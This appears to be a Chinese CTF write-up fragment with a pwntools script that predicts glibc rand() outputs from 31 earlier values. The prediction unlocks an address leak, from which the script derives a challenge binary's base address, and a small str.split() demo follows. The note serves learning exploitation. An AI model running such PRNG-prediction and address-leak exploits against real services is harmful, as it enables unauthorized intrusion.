http://www.mutepig.club/index.php/archives/61/
这里是原理的推导,下面根据dalao的writeup,贴出py代码
def guess(i):
    """Submit *i* as a guess and return the number the service echoes back.

    Uses the module-level pwntools tube ``p`` (not a parameter). ``'5'`` is sent
    first, presumably a menu choice, then the guess itself. The reply line is
    expected to end with the number plus one trailing character (the writeup
    shows ``... number is 499183478!``), so the last whitespace-separated token
    is trimmed by one character before conversion to ``int``.
    """
    p.sendline('5')
    p.recvuntil('> ')
    p.sendline(str(i))
    reply = p.recvline()
    # Consume the prompt so the tube is positioned for the next command.
    p.recvuntil('> ')
    last_token = reply.split()[-1]
    return int(last_token[:-1])
print('[+]guess')
p.recvuntil('> ')
baseAddr = 0
# The recurrence used below needs 31 earlier outputs, so collect those first.
lstRand = [guess(i) for i in range(31)]
# Per the derivation linked at the top of the page, output i follows from
# outputs i-3 and i-31: glibc's rand() is not a cryptographically secure
# generator, so earlier outputs determine later ones (a service that needs an
# unpredictable value should use a CSPRNG instead). The author's note says the
# prediction is occasionally off by one, hence more than one attempt; this
# loop makes two (i = 31 and 32).
for i in range(31, 33):
    rnd = (lstRand[i - 3] + lstRand[i - 31]) & 0x7fffffff
    p.sendline('5')
    p.recvuntil('> ')
    p.sendline(str(rnd))
    tmp = p.recvline()
    hit = 'G00dj0b' in tmp
    if hit:
        # The success line ends with an address plus one trailing character;
        # 0x202148 is presumably its offset from the binary base (per the writeup).
        baseAddr = int(tmp.split()[-1][:-1]) - 0x202148
    # Consume the prompt whether or not the guess was accepted.
    p.recvuntil('> ')
    if hit:
        break
print('[+]baseAddr:' + hex(baseAddr))
记录一个py的使用方法
# Demonstration of str.split(): the reply is split on whitespace, and the last
# token minus its trailing '!' is the number the exploit parses.
s = 'Wr0ng answer!The number is 499183478!'
parts = s.split()
print(parts)
print(parts[0])
print(parts[-1])
print(parts[-1][:-1])
print(parts[-1][:-2])
['Wr0ng', 'answer!The', 'number', 'is', '499183478!']
Wr0ng
499183478!
499183478
49918347